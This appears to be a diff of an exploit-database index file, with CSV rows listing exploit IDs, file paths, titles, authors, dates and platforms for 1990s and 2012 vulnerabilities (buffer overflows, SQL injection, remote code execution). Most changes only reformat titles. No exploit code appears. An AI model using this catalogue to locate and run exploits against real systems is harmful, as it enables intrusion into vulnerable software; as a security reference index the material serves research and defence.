Extension Enumerate Root Web Server Directory Vulnerability",1999-01-26,Mnemonix,windows,remote,0 -19154,platforms/php/webapps/19154.py,"qdPM v.7 Arbitrary File upload",2012-06-14,loneferret,php,webapps,0 +19154,platforms/php/webapps/19154.py,"qdPM v.7 Arbitrary File upload",2012-06-14,loneferret,php,webapps,0 19156,platforms/windows/remote/19156,"Microsoft Internet Explorer 5.0.1 Invalid Byte Cross-Frame Access Vulnerability",1999-01-28,"Georgi Guninski",windows,remote,0 19158,platforms/solaris/local/19158.c,"Sun Solaris <= 2.5.1 PAM & unix_scheme Vulnerability",1997-02-25,"Cristian Schipor",solaris,local,0 19159,platforms/solaris/local/19159.c,"Solaris <= 2.5.1 ffbconfig Vulnerability",1997-02-10,"Cristian Schipor",solaris,local,0 @@ -16542,19 +16542,19 @@ id,file,description,date,author,platform,type,port 19174,platforms/php/webapps/19174.py,"Useresponse <= 1.0.2 Privilege Escalation & RCE Exploit",2012-06-15,mr_me,php,webapps,0 19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",2012-06-17,metasploit,windows,local,0 19176,platforms/windows/local/19176.rb,"TFM MMPlayer (m3u/ppl File) Buffer Overflow",2012-06-15,metasploit,windows,local,0 -19177,platforms/windows/remote/19177.rb,"ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability",2012-06-15,metasploit,windows,remote,0 +19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4) Vulnerability",2012-06-15,metasploit,windows,remote,0 19178,platforms/php/webapps/19178.txt,"WEBO Site SpeedUp <= 1.6.1 Multiple Vulnerabilities",2012-06-16,dun,php,webapps,0 19179,platforms/php/webapps/19179.txt,"PHP Decoda 3.3.1 Local File Inclusion",2012-06-16,"Number 7",php,webapps,0 -19180,platforms/php/webapps/19180.txt,"News Script PHP v1.2 Multiple Vulnerabilites",2012-06-16,Vulnerability-Lab,php,webapps,0 +19180,platforms/php/webapps/19180.txt,"News Script PHP 1.2 - Multiple Vulnerabilites",2012-06-16,Vulnerability-Lab,php,webapps,0 19181,platforms/windows/dos/19181.txt,"XnView RAS Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 19182,platforms/windows/dos/19182.txt,"XnView ECW Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 19183,platforms/windows/dos/19183.txt,"XnView FlashPix Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 19184,platforms/windows/dos/19184.pl,"Karafun Player 1.20.86 .m3u Crash PoC",2012-06-16,Styxosaurus,windows,dos,0 19185,platforms/hardware/webapps/19185.txt,"Huawei HG866 Authentication Bypass",2012-06-16,hkm,hardware,webapps,0 19186,platforms/windows/remote/19186.rb,"Microsoft XML Core Services MSXML Uninitialized Memory Corruption",2012-06-16,metasploit,windows,remote,0 -19187,platforms/php/webapps/19187.txt,"Wordpress Automatic Plugin v2.0.3 SQL Injection",2012-06-16,nick58,php,webapps,0 -19188,platforms/php/webapps/19188.txt,"Nuked Klan SP CMS v4.5 SQL Injection Vulnerability",2012-06-16,Vulnerability-Lab,php,webapps,0 -19189,platforms/php/webapps/19189.txt,"iScripts EasyCreate CMS v2.0 Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0 +19187,platforms/php/webapps/19187.txt,"Wordpress Automatic Plugin 2.0.3 - SQL Injection",2012-06-16,nick58,php,webapps,0 +19188,platforms/php/webapps/19188.txt,"Nuked Klan SP CMS 4.5 - SQL Injection Vulnerability",2012-06-16,Vulnerability-Lab,php,webapps,0 +19189,platforms/php/webapps/19189.txt,"iScripts EasyCreate CMS 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0 19192,platforms/windows/local/19192,"Hancom Office 2007 Reboot.ini Clear-Text Passwords Vulnerability",1999-02-09,"Russ Cooper",windows,local,0 19193,platforms/multiple/remote/19193,"Allaire Forums 2.0.4 Getfile Vulnerability",1999-02-11,"Cameron Childress",multiple,remote,0 19194,platforms/multiple/remote/19194,"Microsoft IIS 3.0/4.0 Using ASP And FSO To Read Server Files Vulnerability",1999-02-11,"Gary Geisbert",multiple,remote,0 @@ -16563,7 +16563,7 @@ id,file,description,date,author,platform,type,port 19197,platforms/windows/remote/19197,"Microsoft Windows NT <= 4.0 SP5,Terminal Server 4.0 ""Pass the Hash"" with Modified SMB Client Vulnerability",1997-04-08,"Paul Ashton",windows,remote,0 19198,platforms/windows/local/19198,"Microsoft Windows NT <= 4.0 SP4 Known DLL Cache Vulnerability",1999-02-18,L0pht,windows,local,0 19199,platforms/solaris/local/19199.c,"Solaris <= 2.5.1 automount Vulnerability",1997-11-26,Anonymous,solaris,local,0 -19200,platforms/unix/local/19200.c,"BSD/OS <= 2.1,Caldera UnixWare 7/7.1 .0,FreeBSD FreeBSD 1.1.5 .1/2.0 ,HP HP-UX <= 10.34,IBM AIX <= 4.2,SGI IRIX <= 6.3,SunOS <= 4.1.4 libXt library Vulnerability (1)",1997-08-25,bloodmask,unix,local,0 +19200,platforms/unix/local/19200.c,"BSD/OS <= 2.1,Caldera UnixWare 7/7.1 .0,FreeBSD FreeBSD 1.1.5 .1/2.0 ,HP HP-UX <= 10.34,IBM AIX <= 4.2,SGI IRIX <= 6.3,SunOS <= 4.1.4 libXt library Vulnerability (1)",1997-08-25,bloodmask,unix,local,0 19201,platforms/unix/local/19201.c,"BSD/OS <= 2.1,Caldera UnixWare 7/7.1 .0,FreeBSD FreeBSD 1.1.5 .1/2.0 ,HP HP-UX <= 10.34,IBM AIX <= 4.2,SGI IRIX <= 6.3,SunOS <= 4.1.4 libXt library Vulnerability (2)",1997-08-25,jGgM,unix,local,0 19202,platforms/unix/local/19202.c,"BSD/OS <= 2.1,Caldera UnixWare 7/7.1 .0,FreeBSD FreeBSD 1.1.5 .1/2.0 ,HP HP-UX <= 10.34,IBM AIX <= 4.2,SGI IRIX <= 6.3,SunOS <= 4.1.4 libXt library Vulnerability (3)",1997-08-25,jGgM,unix,local,0 19203,platforms/unix/local/19203.c,"BSD/OS <= 2.1,DG/UX <= 4.0,Debian Linux 0.93,Digital UNIX <= 4.0 B,FreeBSD <= 2.1.5,HP-UX <= 10.34,IBM AIX <= 4.1.5,NetBSD 1.0/1.1,NeXTstep <= 4.0, SGI IRIX <= 6.3,SunOS <= 4.1.4 rlogin Vulnerability",1996-12-04,"Roger Espel Llima",unix,local,0 @@ -16586,7 +16586,7 @@ id,file,description,date,author,platform,type,port 19221,platforms/multiple/remote/19221,"SmartDesk WebSuite 2.1 Buffer Overflow Vulnerability",1999-05-25,cmart,multiple,remote,0 19222,platforms/multiple/remote/19222,"Gordano NTMail 4.2 Web File Access Vulnerability",1999-05-25,Marc,multiple,remote,0 19223,platforms/multiple/remote/19223,"Floosietek FTGate 2.1 Web File Access Vulnerability",1999-05-25,Marc,multiple,remote,0 -19224,platforms/windows/remote/19224.c,"Computalynx CMail 2.3 Web File Access Vulnerability",1999-05-25,Marc,windows,remote,0 +19224,platforms/windows/remote/19224.c,"Computalynx CMail 2.3 Web File Access Vulnerability",1999-05-25,Marc,windows,remote,0 19225,platforms/multiple/dos/19225,"Compaq Client Management Agents 3.70/4.0,Insight Management Agents 4.21 A/4.22 A/4.30 A,Intelligent Cluster Administrator 1.0,Management Agents for Workstations 4.20 A,Server Management Agents <= 4.23,Survey Utility 2.0 Web File Access Vulnerability",1999-05-25,"Master Dogen",multiple,dos,0 19226,platforms/linux/remote/19226.c,"University of Washington pop2d 4.4 Buffer Overflow Vulnerability",1999-05-26,"Chris Evans",linux,remote,0 19227,platforms/windows/local/19227,"IBM Remote Control Software 1.0 Vulnerability",1999-05-10,"Thomas Krug",windows,local,0 @@ -16602,7 +16602,7 @@ id,file,description,date,author,platform,type,port 19237,platforms/aix/remote/19237,"Gordano NTMail 3.0/5.0 SPAM Relay Vulnerability",1999-06-08,Geo,aix,remote,0 19238,platforms/windows/remote/19238,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 DoS Duplicate Hostname Vulnerability",1999-06-04,"Carl Byington",windows,remote,0 19239,platforms/windows/remote/19239,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping Vulnerability",1999-06-04,"Scott Danahy",windows,remote,0 -19240,platforms/linux/local/19240.c,"Caldera kdenetwork 1.1.1 -1,Caldera OpenLinux 1.3/2.2,KDE KDE 1.1/1.1.1, RedHat Linux 6.0 K-Mail File Creation Vulnerability",1999-06-09,"Brian Mitchell",linux,local,0 +19240,platforms/linux/local/19240.c,"Caldera kdenetwork 1.1.1 -1,Caldera OpenLinux 1.3/2.2,KDE KDE 1.1/1.1.1, RedHat Linux 6.0 K-Mail File Creation Vulnerability",1999-06-09,"Brian Mitchell",linux,local,0 19241,platforms/linux/remote/19241.c,"Debian Linux 2.1,Linux kernel 2.2/2.3,RedHat Linux 6.0,S.u.S.E. Linux 6.1 IP Options Vulnerability",1999-06-01,"Piotr Wilkin",linux,remote,0 19242,platforms/multiple/remote/19242,"CdomainFree <= 2.4 Remote File Execution Vulnerability",1999-06-01,"Salvatore Sanfilippo -antirez-",multiple,remote,0 19243,platforms/linux/local/19243,"G. Wilford man 2.3.10 Symlink Vulnerability",1999-06-02,"Thomas Fischbacher",linux,local,0 @@ -16636,7 +16636,7 @@ id,file,description,date,author,platform,type,port 19272,platforms/linux/local/19272,"Linux kernel 2.2 ldd core Vulnerability",1999-01-26,"Dan Burcaw",linux,local,0 19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 day5notifier Vulnerability",1997-05-16,"Mike Neuman",irix,local,0 19274,platforms/irix/local/19274.c,"SGI IRIX <= 6.3 df Vulnerability",1997-05-24,"David Hedley",irix,local,0 -19275,platforms/irix/local/19275.c,"SGI IRIX <= 6.4 datman/cdman Vulnerability",1996-12-09,"Yuri Volobuev",irix,local,0 +19275,platforms/irix/local/19275.c,"SGI IRIX <= 6.4 datman/cdman Vulnerability",1996-12-09,"Yuri Volobuev",irix,local,0 19276,platforms/irix/local/19276.c,"SGI IRIX <= 6.2 eject Vulnerability (1)",1997-05-25,DCRH,irix,local,0 19277,platforms/irix/local/19277.c,"SGI IRIX <= 6.2 eject Vulnerability (2)",1997-05-25,"Last Stage of Delirium",irix,local,0 19278,platforms/hp-ux/dos/19278.pl,"HP HP-UX <= 10.20,IBM AIX <= 4.1.5 connect() Denial of Service Vulnerability",1997-03-05,"Cahya Wirawan",hp-ux,dos,0 @@ -16653,7 +16653,7 @@ id,file,description,date,author,platform,type,port 19289,platforms/windows/dos/19289.txt,"Samsung AllShare 2.1.1.0 NULL Pointer Deference",2012-06-19,"Luigi Auriemma",windows,dos,0 19290,platforms/multiple/dos/19290.txt,"Airlock WAF 4.2.4 Overlong UTF-8 Sequence Bypass",2012-06-19,"SEC Consult",multiple,dos,0 19291,platforms/windows/remote/19291.rb,"EZHomeTech EzServer <= 6.4.017 Stack Buffer Overflow Vulnerability",2012-06-19,metasploit,windows,remote,0 -19292,platforms/php/webapps/19292.txt,"iBoutique eCommerce v4.0 Multiple Web Vulnerabilites",2012-06-19,Vulnerability-Lab,php,webapps,0 +19292,platforms/php/webapps/19292.txt,"iBoutique eCommerce 4.0 - Multiple Web Vulnerabilites",2012-06-19,Vulnerability-Lab,php,webapps,0 19293,platforms/windows/local/19293.py,"Sysax <= 5.62 Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",windows,local,0 19294,platforms/php/webapps/19294.txt,"WordPress Schreikasten 0.14.13 XSS",2012-06-20,"Henry Hoggard",php,webapps,0 19295,platforms/windows/remote/19295.rb,"Adobe Flash Player AVM Verification Logic Array Indexing Code Execution",2012-06-20,metasploit,windows,remote,0 @@ -16668,7 +16668,7 @@ id,file,description,date,author,platform,type,port 19305,platforms/linux/local/19305.c,"RedHat Linux 5.0 msgchk Vulnerability",1998-01-19,"Cesar Tascon Alvarez",linux,local,0 19306,platforms/aix/local/19306.c,"IBM AIX 4.2.1 portmir Buffer Overflow & Insecure Temporary File Creation Vulnerabilities",1997-10-29,"BM ERS Team",aix,local,0 19307,platforms/aix/local/19307.c,"IBM AIX <= 4.2 ping Buffer Overflow Vulnerability",1997-07-21,"Bryan P. Self",aix,local,0 -19308,platforms/linux/local/19308.c,"Linux kernel 2.0/2.0.33 i_count Overflow Vulnerability",1998-01-14,"Aleph One",linux,local,0 +19308,platforms/linux/local/19308.c,"Linux kernel 2.0/2.0.33 i_count Overflow Vulnerability",1998-01-14,"Aleph One",linux,local,0 19309,platforms/aix/local/19309.c,"IBM AIX <= 4.2 lchangelv Buffer Overflow Vulnerability",1997-07-21,"Bryan P. Self",aix,local,0 19310,platforms/irix/local/19310.c,"SGI IRIX <= 6.4 login Vulnerability",1997-05-26,"David Hedley",irix,local,0 19311,platforms/linux/local/19311.c,"RedHat Linux 4.2,SGI IRIX <= 6.3,Solaris <= 2.6 mailx Vulnerability (1)",1998-06-20,"Alvaro Martinez Echevarria",linux,local,0 @@ -16708,12 +16708,12 @@ id,file,description,date,author,platform,type,port 19346,platforms/freebsd/local/19346.c,"FreeBSD <= 3.1,Solaris <= 2.6 Domain Socket Vulnerability",1997-06-19,"Thamer Al-Herbish",freebsd,local,0 19347,platforms/irix/local/19347.c,"SGI IRIX <= 6.3 pset Vulnerability",1997-07-17,"Last Stage of Delirium",irix,local,0 19348,platforms/aix/remote/19348,"IBM AIX <= 3.2.5 login(1) Vulnerability",1996-12-04,Anonymous,aix,remote,0 -19349,platforms/irix/local/19349,"SGI IRIX <= 6.4 rmail Vulnerability",1997-05-07,"Yuri Volobuev",irix,local,0 +19349,platforms/irix/local/19349,"SGI IRIX <= 6.4 rmail Vulnerability",1997-05-07,"Yuri Volobuev",irix,local,0 19350,platforms/solaris/local/19350.sh,"Solaris <= 2.5.1 License Manager Vulnerability",1998-10-21,"Joel Eriksson",solaris,local,0 19351,platforms/irix/local/19351.sh,"SGI IRIX 5.2/5.3 serial_ports Vulnerability",1994-02-02,transit,irix,local,0 19353,platforms/irix/local/19353,"SGI IRIX <= 6.4 suid_exec Vulnerability",1996-12-02,"Yuri Volobuev",irix,local,0 19354,platforms/aix/local/19354,"SGI IRIX 5.1/5.2 sgihelp Vulnerability",1996-12-02,Anonymous,aix,local,0 -19355,platforms/irix/local/19355,"SGI IRIX <= 6.4 startmidi Vulnerabilty",1997-02-09,"David Hedley",irix,local,0 +19355,platforms/irix/local/19355,"SGI IRIX <= 6.4 startmidi Vulnerabilty",1997-02-09,"David Hedley",irix,local,0 19356,platforms/irix/local/19356,"SGI IRIX <= 6.3 Systour and OutOfBox Vulnerabilities",1996-10-30,"Tun-Hui Hu",irix,local,0 19357,platforms/irix/dos/19357.sh,"SGI IRIX 6.2 SpaceWare Vulnerability",1996-10-30,"J.A. Guitierrez",irix,dos,0 19358,platforms/irix/local/19358,"SGI IRIX <= 6.4 xfsdump Vulnerability",1997-05-07,"Yuri Volobuev",irix,local,0 @@ -16724,12 +16724,12 @@ id,file,description,date,author,platform,type,port 19363,platforms/multiple/remote/19363,"Netscape FastTrack Server 3.0.1 Fasttrack Root Directory Listing Vulnerability",1999-06-07,"JesĂºs LĂ³pez de Aguileta",multiple,remote,0 19364,platforms/netware/local/19364,"Novell Netware 4.1/4.11 SP5B Remote.NLM Weak Encryption Vulnerability",1999-04-09,dreamer,netware,local,0 19365,platforms/netware/remote/19365,"Novell Netware 4.1/4.11 SP5B NDS Default Rights Vulnerability",1999-04-09,"Simple Nomad",netware,remote,0 -19368,platforms/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes SMTPA MTA Mail Relay Vulnerability",1999-06-15,"Robert Lister",multiple,dos,0 +19368,platforms/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes SMTPA MTA Mail Relay Vulnerability",1999-06-15,"Robert Lister",multiple,dos,0 19369,platforms/windows/remote/19369.rb,"Adobe Flash Player Object Type Confusion",2012-06-25,metasploit,windows,remote,0 -19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0 .x/5.0 Buffer Overflow Vulnerabilities",1999-06-25,KSR[T],linux,local,0 +19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0 .x/5.0 Buffer Overflow Vulnerabilities",1999-06-25,KSR[T],linux,local,0 19371,platforms/linux/local/19371.c,"VMWare 1.0.1 Buffer Overflow Vulnerability",1999-06-25,funkysh,linux,local,0 19372,platforms/windows/dos/19372,"Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Null Session Admin Name Vulnerability",1999-06-28,"J D Glaser",windows,dos,0 -19373,platforms/linux/local/19373.c,"Debian Linux 2.0/2.0 r5,FreeBSD <= 3.2,OpenBSD 2.4,RedHat Linux 5.2 i386,S.u.S.E. Linux <= 6.1 Lsof Buffer Overflow Vulnerability (1)",1999-02-17,c0nd0r,linux,local,0 +19373,platforms/linux/local/19373.c,"Debian Linux 2.0/2.0 r5,FreeBSD <= 3.2,OpenBSD 2.4,RedHat Linux 5.2 i386,S.u.S.E. Linux <= 6.1 Lsof Buffer Overflow Vulnerability (1)",1999-02-17,c0nd0r,linux,local,0 19374,platforms/linux/local/19374.c,"Debian Linux 2.0/2.0 r5,FreeBSD <= 3.2,OpenBSD 2.4,RedHat Linux 5.2 i386,S.u.S.E. Linux <= 6.1 Lsof Buffer Overflow Vulnerability (2)",1999-02-17,Zhodiac,linux,local,0 19376,platforms/windows/local/19376,"Microsoft IIS 2.0/3.0/4.0 ISAPI GetExtensionVersion() Vulnerability",1999-03-08,"Fabien Royer",windows,local,0 19377,platforms/multiple/dos/19377,"Ipswitch IMail 5.0 Imapd Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0 @@ -16739,9 +16739,9 @@ id,file,description,date,author,platform,type,port 19381,platforms/php/webapps/19381.php,"SugarCRM CE <= 6.3.1 ""unserialize()"" PHP Code Execution",2012-06-23,EgiX,php,webapps,0 19382,platforms/multiple/dos/19382,"Ipswitch IMail 5.0 Whois32 Daemon Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0 19383,platforms/multiple/remote/19383,"Qbik WinGate Standard <= 3.0.5 Log Service Directory Traversal Vulnerability",1999-02-22,eEye,multiple,remote,0 -19384,platforms/linux/local/19384.c,"Debian Linux <= 2.1 Print Queue Control Vulnerability",1999-07-02,"Chris Leishman",linux,local,0 +19384,platforms/linux/local/19384.c,"Debian Linux <= 2.1 Print Queue Control Vulnerability",1999-07-02,"Chris Leishman",linux,local,0 19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 DJVU Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0 -19386,platforms/php/webapps/19386.txt,"UCCASS <= v1.8.1 Blind SQL Injection Vulnerability",2012-06-24,dun,php,webapps,0 +19386,platforms/php/webapps/19386.txt,"UCCASS <= 1.8.1 - Blind SQL Injection Vulnerability",2012-06-24,dun,php,webapps,0 19387,platforms/windows/remote/19387.rb,"Apple iTunes 10 Extended M3U Stack Buffer Overflow",2012-06-25,metasploit,windows,remote,0 19388,platforms/windows/dos/19388.py,"Kingview Touchview 6.53 EIP Overwrite",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,555 19389,platforms/windows/dos/19389.txt,"Kingview Touchview 6.53 Multiple Heap Overflow Vulnerabilities",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 @@ -16750,7 +16750,7 @@ id,file,description,date,author,platform,type,port 19393,platforms/windows/dos/19393.py,"Able2Doc and Able2Doc Professional v 6.0 Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19394,platforms/asp/webapps/19394.txt,"Parodia 6.8 employer-profile.asp SQL Injection",2012-06-25,"Carlos Mario Penagos Hollmann",asp,webapps,0 19398,platforms/php/webapps/19398.txt,"Wordpress Fancy Gallery Plugin 1.2.4 Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 -19400,platforms/php/webapps/19400.txt,"WordPress Website FAQ Plugin v1.0 SQL Injection",2012-06-26,"Chris Kellum",php,webapps,0 +19400,platforms/php/webapps/19400.txt,"WordPress Website FAQ Plugin 1.0 - SQL Injection",2012-06-26,"Chris Kellum",php,webapps,0 19401,platforms/windows/local/19401.txt,"quicktime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",windows,local,0 19402,platforms/hardware/remote/19402.txt,"Root Exploit Western Digital's WD TV Live SMP/Hub",2012-06-26,"Wolfgang Borst",hardware,remote,0 19403,platforms/php/webapps/19403.rb,"SugarCRM <= 6.3.1 unserialize() PHP Code Execution",2012-06-26,metasploit,php,webapps,0 @@ -16758,7 +16758,7 @@ id,file,description,date,author,platform,type,port 19407,platforms/windows/remote/19407.py,"Symantec PcAnywhere 12.5.0 Login and Password Field Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0 19408,platforms/php/webapps/19408.txt,"Zend Framework Local File Disclosure",2012-06-27,"SEC Consult",php,webapps,0 19409,platforms/windows/dos/19409.txt,"Sielco Sistemi Winlog 2.07.16 Multiple Vulnerabilities",2012-06-27,"Luigi Auriemma",windows,dos,0 -19410,platforms/windows/dos/19410.py,"Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 Buffer Overflow DoS Vulnerability",1999-02-22,Prizm,windows,dos,0 +19410,platforms/windows/dos/19410.py,"Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 Buffer Overflow DoS Vulnerability",1999-02-22,Prizm,windows,dos,0 19411,platforms/bsd/local/19411,"BSDI BSD/OS 4.0,FreeBSD 3.2,NetBSD 1.4 x86,OpenBSD 2.5 UFS Secure Level 1 Vulnerability",1999-07-02,Stealth,bsd,local,0 19412,platforms/windows/local/19412.c,"Qbik WinGate 3.0 Registry Vulnerability",1999-02-22,Chris,windows,local,0 19413,platforms/windows/dos/19413.c,"Windows 95/98,Windows NT Enterprise Server <= 4.0 SP5,Windows NT Terminal Server <= 4.0 SP4,Windows NT Workstation <= 4.0 SP5 (1)",1999-07-03,Coolio,windows,dos,0 @@ -16771,10 +16771,10 @@ id,file,description,date,author,platform,type,port 19420,platforms/multiple/remote/19420.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1,HP HP-UX <= 11.0,Solaris <= 7.0,SunOS <= 4.1.4 rpc.cmsd Buffer Overflow Vulnerability (1)",1999-07-13,"Last Stage of Delirium",multiple,remote,0 19421,platforms/multiple/remote/19421.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1,HP HP-UX <= 11.0,Solaris <= 7.0,SunOS <= 4.1.4 rpc.cmsd Buffer Overflow Vulnerability (2)",1999-07-13,jGgM,multiple,remote,0 19422,platforms/linux/local/19422,"BMC Software Patrol <= 3.2.5 Patrol SNMP Agent File Creation/Permission Vulnerability",1999-07-14,"Andrew Alness",linux,local,0 -19423,platforms/multiple/dos/19423.c,"BSD/OS <= 4.0,FreeBSD <= 3.2,Linux kernel <= 2.3,NetBSD <= 1.4 Shared Memory Denial of Service Vulnerability",1999-07-15,"Mike Perry",multiple,dos,0 +19423,platforms/multiple/dos/19423.c,"BSD/OS <= 4.0,FreeBSD <= 3.2,Linux kernel <= 2.3,NetBSD <= 1.4 Shared Memory Denial of Service Vulnerability",1999-07-15,"Mike Perry",multiple,dos,0 19424,platforms/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) <= 2.1,Microsoft IIS 3.0/4.0,Microsoft Index Server 2.0,Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (1)",1999-07-19,"rain forest puppy",windows,remote,0 19425,platforms/windows/local/19425,"Microsoft Data Access Components (MDAC) <= 2.1,Microsoft IIS 3.0/4.0,Microsoft Index Server 2.0,Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local,0 -19426,platforms/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0,SGI IRIX <= 6.5.4,SGI UNICOS <= 10.0 6 arrayd.auth Default Configuration Vulnerability",1999-07-19,"Last Stage of Delirium",multiple,remote,0 +19426,platforms/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0,SGI IRIX <= 6.5.4,SGI UNICOS <= 10.0 6 arrayd.auth Default Configuration Vulnerability",1999-07-19,"Last Stage of Delirium",multiple,remote,0 19427,platforms/osx/local/19427,"Apple At Ease 5.0 Vulnerability",1999-05-13,"Tim Conrad",osx,local,0 19428,platforms/linux/local/19428.c,"Samba Pre-2.0.5 Vulnerabilities",1999-07-21,"Gerald Britton",linux,local,0 19429,platforms/linux/local/19429.sh,"Rational Software ClearCase for Unix 3.2 ClearCase SUID Vulnerability",1999-05-02,Mudge,linux,local,0 @@ -16784,7 +16784,7 @@ id,file,description,date,author,platform,type,port 19433,platforms/windows/local/19433.rb,"Apple QuickTime TeXML Stack Buffer Overflow",2012-06-28,metasploit,windows,local,0 19434,platforms/osx/local/19434,"Quinn ""the Eskimo"" and Peter N. Lewis Internet Config 1.0/2.0 Weak Password Encryption Vulnerability",1999-07-28,"Dawid adix Adamski",osx,local,0 19435,platforms/windows/remote/19435.html,"Microsoft JET 3.5/3.51/4.0 VBA Shell Vulnerability",1999-07-29,BrootForce,windows,remote,0 -19436,platforms/hardware/dos/19436,"Check Point Software Firewall-1 3.0/1 4.0 Table Saturation Denial of Service Vulnerability",1999-07-29,"Lance Spitzner",hardware,dos,0 +19436,platforms/hardware/dos/19436,"Check Point Software Firewall-1 3.0/1 4.0 Table Saturation Denial of Service Vulnerability",1999-07-29,"Lance Spitzner",hardware,dos,0 19437,platforms/osx/local/19437,"ELS Screen to Screen 1.0 Multiple Password Vulnerabilities",1999-07-29,"Prozaq of mSec",osx,local,0 19438,platforms/osx/local/19438,"Ogopogo Autothenticate 1.1.5 Weak Password Encryption Vulnerability",1999-07-29,"Prozaq of mSec",osx,local,0 19439,platforms/osx/local/19439,"Power On Software On Guard for MacOS 3.2 Emergency Password Vulnerability",1999-07-29,"Prozaq of mSec",osx,local,0 @@ -16807,10 +16807,10 @@ id,file,description,date,author,platform,type,port 19457,platforms/multiple/dos/19457,"Ms Commercial Internet System 2.0/2.5,IIS 4.0,Site Server Commerce Edition 3.0 alpha/3.0 DoS",1999-08-11,"Nobuo Miwa",multiple,dos,0 19458,platforms/linux/remote/19458.c,"Linux kernel 2.0.30/2.0.35/2.0.36/2.0.37 Blind TCP Spoofing Vulnerability",1999-07-31,Nergal,linux,remote,0 19459,platforms/multiple/remote/19459,"Hybrid Ircd 5.0.3 p7 Buffer Overflow Vulnerability",1999-08-13,"jduck and stranjer",multiple,remote,0 -19460,platforms/multiple/local/19460.sh,"Oracle <= 8 8.1.5 Intelligent Agent Vulnerability (1)",1999-08-16,"Brock Tellier",multiple,local,0 +19460,platforms/multiple/local/19460.sh,"Oracle <= 8 8.1.5 Intelligent Agent Vulnerability (1)",1999-08-16,"Brock Tellier",multiple,local,0 19461,platforms/multiple/local/19461.c,"Oracle <= 8 8.1.5 Intelligent Agent Vulnerability (2)",1999-08-16,"Gilles PARC",multiple,local,0 19462,platforms/windows/local/19462.c,"Microsoft Windows 95/98 IE5/Telnet Heap Overflow Vulnerability",1999-08-16,"Jeremy Kothe",windows,local,0 -19463,platforms/linux/remote/19463.c,"S.u.S.E. Linux <= 6.2,Slackware Linux 3.2/3.6 identd Denial of Service",1999-08-16,friedolin,linux,remote,0 +19463,platforms/linux/remote/19463.c,"S.u.S.E. Linux <= 6.2,Slackware Linux 3.2/3.6 identd Denial of Service",1999-08-16,friedolin,linux,remote,0 19464,platforms/linux/local/19464.c,"RedHat Linux <= 6.0, Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (1)",1999-08-18,m0f0,linux,local,0 19465,platforms/linux/local/19465.c,"RedHat Linux <= 6.0, Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (2)",1999-08-18,sk8,linux,local,0 19466,platforms/multiple/remote/19466,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 Vulnerability",1999-08-18,"Gregory Duchemin",multiple,remote,0 @@ -16828,7 +16828,7 @@ id,file,description,date,author,platform,type,port 19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1,FreeBSD 3.0/3.1/3.2,RedHat Linux <= 6.0 amd Buffer Overflow Vulnerability (1)",1999-08-31,Taeho,unix,remote,0 19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1,FreeBSD 3.0/3.1/3.2,RedHat Linux <= 6.0 amd Buffer Overflow Vulnerability (2)",1999-08-30,c0nd0r,unix,remote,0 19480,platforms/multiple/local/19480.c,"ISC INN <= 2.2,RedHat Linux <= 6.0 inews Buffer Overflow Vulnerability",1999-09-02,bawd,multiple,local,0 -19481,platforms/php/webapps/19481.txt,"WordPress Paid Business Listings v1.0.2 Blind SQL Injection",2012-06-30,"Chris Kellum",php,webapps,0 +19481,platforms/php/webapps/19481.txt,"WordPress Paid Business Listings 1.0.2 - Blind SQL Injection",2012-06-30,"Chris Kellum",php,webapps,0 19482,platforms/multiple/dos/19482.txt,"GIMP 2.8.0 FIT File Format DoS",2012-06-30,"Joseph Sheridan",multiple,dos,0 19483,platforms/windows/dos/19483.txt,"IrfanView JLS Formats PlugIn Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos,0 19484,platforms/windows/remote/19484.rb,"HP Data Protector Create New Folder Buffer Overflow",2012-07-01,metasploit,windows,remote,3817 @@ -16865,10 +16865,10 @@ id,file,description,date,author,platform,type,port 19515,platforms/windows/remote/19515.txt,"MS IE 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer 